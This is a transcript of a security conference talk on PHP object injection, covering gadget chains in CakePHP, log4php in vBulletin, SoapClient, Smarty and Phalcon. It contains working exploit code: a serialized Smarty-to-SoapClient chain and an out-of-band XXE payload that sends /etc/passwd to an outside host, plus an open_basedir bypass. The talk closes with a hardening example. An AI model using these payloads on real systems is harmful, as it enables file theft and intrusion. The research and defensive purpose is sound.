Copy of PHP Object Injection Revisited

No description
by

liuke liuke

on 29 March 2018


Transcript of Copy of PHP Object Injection Revisited

$ whoami
Deserialization bugs in 2013, you kiddin'?
Actually still alive, just remember Ruby and YAML
(CVE-2013-0156, CVE-2013-0333)
What about PHP?
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution (CVE-2012-5692)
But...
No new concepts since "Shocking news in PHP exploitation" by Stefan Esser (2009)
What is actually
PHP Object Injection?
class Foo {
    public $bar = "baz";
}
O:3:"Foo":1:{s:3:"bar";s:3:"baz";}
serialize()
Vulnerable PHP Web Application
object(Foo)#2 (1) {
    ["bar"]=>
    string(3) "baz"
}
unserialize()
POST /
PHP magic methods
__construct()
__destruct()
__call()
__callStatic()
__get()
__set()
__isset()
__unset()
__sleep()
__wakeup()
__toString()
__invoke()
__set_state()
__clone()
PHP Object Injection Revisited
me@raz0r.name @ru_raz0r
__destruct
Called when the object is freed, at the latest on script termination
May contain code that becomes dangerous once the object (and its properties) comes from attacker-controlled serialized data
CakePHP <= 1.3.5 / 1.2.8
function __destruct() {
    if ($this->__cache) {
        $core = App::core('cake');
        unset($this->__paths[rtrim($core[0], DS)]);
        // all three arrays come from object properties, i.e. from the serialized string
        Cache::write('dir_map', array_filter($this->__paths), '_cake_core_');
        Cache::write('file_map', array_filter($this->__map), '_cake_core_');
        Cache::write('object_map', $this->__objects, '_cake_core_');
    }
}
Why only __destruct and web app's classes?
vBulletin 5
core
libraries
log4php
examples (no 403!)
log4php
http://logging.apache.org/log4php/
used by CMS Made Simple, SugarCRM, vtiger, etc.
contains handy "examples" dir
vBulletin just cloned the repo leaving examples and did not protect it
Examples
appender_console.php
appender_dailyfile.php
appender_echo.php
appender_file.php
appender_mailevent.php
appender_mail.php
appender_mongodb.php
appender_null.php
appender_pdo.php
appender_php.php
appender_rollingfile.php
appender_socket.php
appender_socket_server.php
appender_syslog.php
cache.php
configurator_basic.php
configurator_php.php
configurator_xml.php
filter_denyall.php
filter_levelmatch.php
filter_levelrange.php
filter_stringmatch.php
layout_html.php
layout_pattern.php
layout_simple.php
layout_ttcc.php
layout_xml.php
mdc.php
ndc.php
renderer_default.php
renderer_map.php
simple.php

class Net_Server_Handler_Log extends Net_Server_Handler {

    private $hierarchy;

    function onStart() {
        $this->hierarchy = Logger::getRootLogger();
    }

    function onReceiveData($clientId = 0, $data = "") {
        $events = $this->getEvents($data);
        foreach ($events as $event) {
            $root = $this->hierarchy->getRootLogger();
            // a method is called on whatever object unserialize() returned
            if ($event->getLoggerName() === 'root') {
                $root->callAppenders($event);
            } else {
                $loggers = $this->hierarchy->getCurrentLoggers();
                foreach ($loggers as $logger) {
                    $root->callAppenders($event);
                    $appenders = $logger->getAllAppenders();
                    foreach ($appenders as $appender) {
                        $appender->doAppend($event);
                    }
                }
            }
        }
    }

    function getEvents($data) {
        if (preg_match('/^<log4php:event/', $data)) {
            throw new Exception("Please use 'log4php.appender.default.useXml = false' in appender_socket.properties file!");
        }
        // raw socket data is split on the "O:<len>" object prefix and
        // unserialized as-is: any loaded class, any magic method
        preg_match('/^(O:\d+)/', $data, $parts);
        $events = split($parts[1], $data);
        array_shift($events);
        $size = count($events);
        for ($i = 0; $i < $size; $i++) {
            $events[$i] = unserialize($parts[1] . $events[$i]);
        }
        return $events;
    }
}

$host = 'localhost';
$port = 4242;
$server = Net_Server::create('sequential', $host, $port);
$handler = new Net_Server_Handler_Log();
$server->setCallbackObject($handler);
$server->start();
Let's use PHP classes instead!
$magic = array('__construct', '__destruct', '__call', '__callStatic',
               '__get', '__set', '__isset', '__unset', '__sleep', '__wakeup',
               '__toString', '__invoke', '__set_state', '__clone');
$classes = get_declared_classes();
foreach ($classes as $class) {
    // public methods only, which is all an unserialized object exposes anyway
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, $magic)) {
            print $class . '::' . $method . "\n";
        }
    }
}
Get all the magic methods!
Exception::__toString
ErrorException::__toString
DateTime::__wakeup
DOMException::__toString
LogicException::__toString
BadFunctionCallException::__toString
BadMethodCallException::__toString
DomainException::__toString
InvalidArgumentException::__toString
LengthException::__toString
OutOfRangeException::__toString
RuntimeException::__toString
OutOfBoundsException::__toString
OverflowException::__toString
RangeException::__toString
UnderflowException::__toString
UnexpectedValueException::__toString
CachingIterator::__toString
RecursiveCachingIterator::__toString
SplFileInfo::__toString
DirectoryIterator::__toString
FilesystemIterator::__toString
RecursiveDirectoryIterator::__toString
GlobIterator::__toString
SplFileObject::__toString
SplTempFileObject::__toString
ReflectionException::__toString
ReflectionFunctionAbstract::__toString
ReflectionFunction::__toString
ReflectionParameter::__toString
ReflectionMethod::__toString
ReflectionClass::__toString
ReflectionObject::__toString
ReflectionProperty::__toString
ReflectionExtension::__toString
PharException::__toString
Phar::__destruct
Phar::__toString
PharData::__destruct
PharData::__toString
PharFileInfo::__destruct
PharFileInfo::__toString
SimpleXMLElement::__toString
SimpleXMLIterator::__toString
SoapClient::__call
SoapFault::__toString
mysqli_sql_exception::__toString
PDOException::__toString
PDO::__wakeup
PDOStatement::__wakeup
__call() is triggered when invoking inaccessible methods in an object context
location
uri
style
use
soap_version
login
password
proxy_host
proxy_port
proxy_login
proxy_password
local_cert
passphrase
authentication
compression
encoding
trace
classmap
exceptions
connection_timeout
typemap
type_name
type_ns
from_xml
cache_wsdl
user_agent
stream_context
features
keep_alive
Options
public SoapClient::SoapClient ( mixed $wsdl [, array $options ] )
WSDL mode
Non-WSDL mode
WSDL - Web Services Description Language
$wsdl = "http://somehost/api.wsdl"
Proper serialization is not implemented when SoapClient is initialized in WSDL mode :(
$wsdl = null
Object survives serialization :)
$event = new SoapClient(null, array(
    'location' => 'http://raz0r.name/api.php',
    'uri'      => 'http://raz0r.name/'
));
$event->getLoggerName(); // undefined method: __call() turns it into a SOAP request to 'location'
SOAP Call to api.php
<?php

header("HTTP/1.0 404 <script>alert(1);</script>");
Fatal error: Uncaught SoapFault exception: [HTTP] <script>alert(1);</script> in appender_socket_server.php:71
SoapClient generates SoapFault exception
Does not filter anything
open_basedir bypass
SoapClient can cache WSDL files locally
ini_set('open_basedir', '/var/www/site/');
ini_set('soap.wsdl_cache_enabled', true);
ini_set('soap.wsdl_cache_dir', '/var/www/');
$c = new SoapClient('http://raz0r.name/test.wsdl', array('cache_wsdl' => WSDL_CACHE_DISK));
-rw------- 1 www-data www-data 530 2013-04-17 13:55 wsdl-raz0r-c7c3f5871a779534f433fa6fa878b92c
open_basedir restriction in effect?
Nope!
XSS
$c = new SoapClient(null, array('uri'=>'http://raz0r.name/', 'location'=>'http://raz0r.name/xxe.xml'));
$c->getLoggerName();
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
Fatal error: Uncaught SoapFault exception: [Client] DTD are not supported by SOAP
But if we use the out-of-band technique...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % a SYSTEM "http://bugsand.hol.es/3_deep?php://filter/read=convert.base64-encode/resource=/etc/passwd">
%a;
%intern;
%trick;
]>
GET /result?[base64-encoded contents of /etc/passwd, omitted]
Host: bugsand.hol.es
Connection: close
[decoded /etc/passwd listing omitted]
Smarty!
public function __destruct()
{
    if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
        // $this->cached->handler is an object property, so it can be any class
        $this->cached->handler->releaseLock($this->smarty, $this->cached);
    }
}
Smarty_Internal_Template
class Smarty {
    public $cache_locking = true;
}

class Smarty_Template_Cached {
    public $is_locked = true;

    public function __construct() {
        // releaseLock() does not exist on SoapClient, so __call() fires the SOAP request
        $this->handler = new SoapClient(null, array(
            'uri'      => 'http://raz0r.name/',
            'location' => 'http://raz0r.name/xxe.xml'
        ));
    }
}

class Smarty_Internal_Template {
    public function __construct() {
        $this->smarty = new Smarty();
        $this->cached = new Smarty_Template_Cached();
    }
}

$c = serialize(new Smarty_Internal_Template());
XXE will be triggered automagically!
Boring stuff
Web application security researcher you have never heard of
Casual CTF player, random bug bounties participant, bla bla
PHP hater since 2006
Some new stuff
Some future stuff
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection vulnerability (CVE-2013-1453)
CubeCart <= 5.2.0 (cubecart.class.php) PHP Object Injection vulnerability (CVE-2013-1465)
all by Egidio Romano
But a method is called on the unserialized object
No useful magic methods in log4php
So what?
Arseny Reutov
XXE
Kudos to Alexey Osipov and Timur Yunusov from Positive Technologies
What if a PHP framework is implemented
as a PHP extension?
Phalcon is a web framework implemented as a C extension, offering high performance and lower resource consumption.
The whole Phalcon class namespace is exposed to every user of a shared host where the extension is loaded, even if they do not use the framework
So we have unserialize...
__wakeup()
Phalcon\Exception::__toString
Phalcon\DI\Injectable::__get
Phalcon\DI::__call
Phalcon\Forms\Element::__toString
Phalcon\Mvc\View\Engine::__get
Phalcon\Mvc\Model\Exception::__toString
Phalcon\Config::__set_state
Phalcon\DI\FactoryDefault::__call
Phalcon\Cache\Exception::__toString
Phalcon\Tag\Exception::__toString
Phalcon\Paginator\Exception::__toString
Phalcon\Validation::__get
Phalcon\Validation\Message::__toString
Phalcon\Validation\Message::__set_state
Phalcon\Validation\Exception::__toString
Phalcon\Validation\Message\Group::__set_state
Phalcon\Db\Index::__set_state
Phalcon\Db\Column::__set_state
Phalcon\Db\Exception::__toString
Phalcon\Db\Reference::__set_state
Phalcon\Db\RawValue::__toString
Phalcon\Acl\Role::__toString
Phalcon\Acl\Resource::__toString
Phalcon\Acl\Exception::__toString
Phalcon\Security\Exception::__toString
Phalcon\Session\Bag::__set
Phalcon\Session\Bag::__get
Phalcon\Session\Bag::__isset
Phalcon\Session\Bag::__unset
Phalcon\Session\Exception::__toString
Phalcon\DI\Exception::__toString
Phalcon\DI\FactoryDefault\CLI::__call
Phalcon\DI\Service::__set_state
Phalcon\Filter\Exception::__toString
Phalcon\Flash\Exception::__toString
Phalcon\CLI\Task::__get
Phalcon\CLI\Console\Exception::__toString
Phalcon\CLI\Dispatcher\Exception::__toString
Phalcon\CLI\Router\Exception::__toString
Phalcon\Annotations\Exception::__toString
Phalcon\Annotations\Reflection::__set_state
Phalcon\Loader\Exception::__toString
Phalcon\Logger\Exception::__toString
Phalcon\Logger\Adapter\File::__wakeup
Phalcon\Config\Exception::__toString
Phalcon\Config\Adapter\Ini::__set_state
Phalcon\Forms\Form::__get
Phalcon\Forms\Exception::__toString
Phalcon\Forms\Element\File::__toString
Phalcon\Forms\Element\Text::__toString
Phalcon\Forms\Element\Date::__toString
Phalcon\Forms\Element\Hidden::__toString
Phalcon\Forms\Element\Numeric::__toString
Phalcon\Forms\Element\Submit::__toString
Phalcon\Forms\Element\Check::__toString
Phalcon\Forms\Element\Select::__toString
Phalcon\Forms\Element\Password::__toString
Phalcon\Forms\Element\TextArea::__toString
Phalcon\Translate\Exception::__toString
Phalcon\Crypt\Exception::__toString
Phalcon\Escaper\Exception::__toString
Phalcon\Assets\Exception::__toString
Phalcon\Http\Cookie::__toString
Phalcon\Http\Cookie\Exception::__toString
Phalcon\Http\Response\Headers::__set_state
Phalcon\Http\Request\Exception::__toString
Phalcon\Http\Response\Exception::__toString
Phalcon\Mvc\View::__set
Phalcon\Mvc\View::__get
Phalcon\Mvc\Micro::__get
Phalcon\Mvc\Model::__call
Phalcon\Mvc\Model::__callStatic
Phalcon\Mvc\Model::__set
Phalcon\Mvc\Model::__get
Phalcon\Mvc\Model::__isset
Phalcon\Mvc\Application::__get
Phalcon\Mvc\Application\Exception::__toString
Phalcon\Mvc\Controller::__get
Phalcon\Mvc\Collection\Exception::__toString
Phalcon\Mvc\Dispatcher\Exception::__toString
Phalcon\Mvc\Micro\LazyLoader::__call
Phalcon\Mvc\Micro\Exception::__toString
Phalcon\Mvc\Model\Message::__toString
Phalcon\Mvc\Model\Message::__set_state
Phalcon\Mvc\Model\ValidationFailed::__toString
Phalcon\Mvc\Model\Transaction\Failed::__toString
Phalcon\Mvc\Model\Transaction\Exception::__toString
Phalcon\Mvc\Router\Exception::__toString
Phalcon\Mvc\User\Plugin::__get
Phalcon\Mvc\User\Module::__get
Phalcon\Mvc\Url\Exception::__toString
Phalcon\Mvc\User\Component::__get
Phalcon\Mvc\View\Exception::__toString
Phalcon\Mvc\View\Engine\Php::__get
Phalcon\Mvc\View\Engine\Volt::__get
Phalcon\Events\Exception::__toString
__wakeup -> fopen -> __toString()
do not unserialize user-supplied data!
So...
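The whole mechanism in one runnable script, as an added example that is not part of the talk: a constructed gadget class with __wakeup/__destruct, an injected payload in the same wire format the slides show, and the hardened unserialize() (allowed_classes, PHP 7+) plus the JSON alternative that the closing advice implies. The class LogFlusher, the paths and the payload are assumptions.

```php
<?php
// Added example, not from the talk. Class name, paths and payload are constructed.

class LogFlusher {
    public $logfile = '/tmp/app.log';   // attacker-controlled after unserialize()
    public $buffer  = '';

    public function __wakeup() {
        // fires as soon as unserialize() has rebuilt the object
        echo "[__wakeup] restored LogFlusher, logfile={$this->logfile}\n";
    }

    public function __destruct() {
        // fires when the object is freed: with an injected $logfile this
        // would be an arbitrary file write, the classic __destruct gadget
        echo "[__destruct] would write buffer to {$this->logfile}\n";
    }
}

// Same wire format as O:3:"Foo":1:{s:3:"bar";s:3:"baz";} on the slides,
// but naming a class that has magic methods and overriding its properties.
$payload = 'O:10:"LogFlusher":2:{s:7:"logfile";s:17:"/tmp/injected.txt";s:6:"buffer";s:5:"hello";}';

// 1. Vulnerable: any loaded class can be instantiated; __wakeup runs now,
//    __destruct runs on unset() or at script end.
$obj = unserialize($payload);
echo "got " . get_class($obj) . "\n";
unset($obj);

// 2. Hardened (PHP >= 7.0): allowed_classes=false turns every object into
//    __PHP_Incomplete_Class, which has no magic methods to trigger.
$safe = unserialize($payload, array('allowed_classes' => false));
echo "got " . get_class($safe) . "\n";
unset($safe);   // nothing runs

// 3. Preferred: carry plain data in a format that cannot name classes at all.
$data = json_decode('{"logfile":"/tmp/injected.txt","buffer":"hello"}', true);
echo "json gives " . gettype($data) . ", no object, no magic methods\n";
```

An allow-list (allowed_classes => array('SomeDto')) is only as safe as the magic methods of the listed classes and their property types, which is why the talk's advice is to not unserialize user data at all.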
Thanks!
Questions?
me@raz0r.name @ru_raz0r
Arseny Reutov
init any class and execute arbitrary methods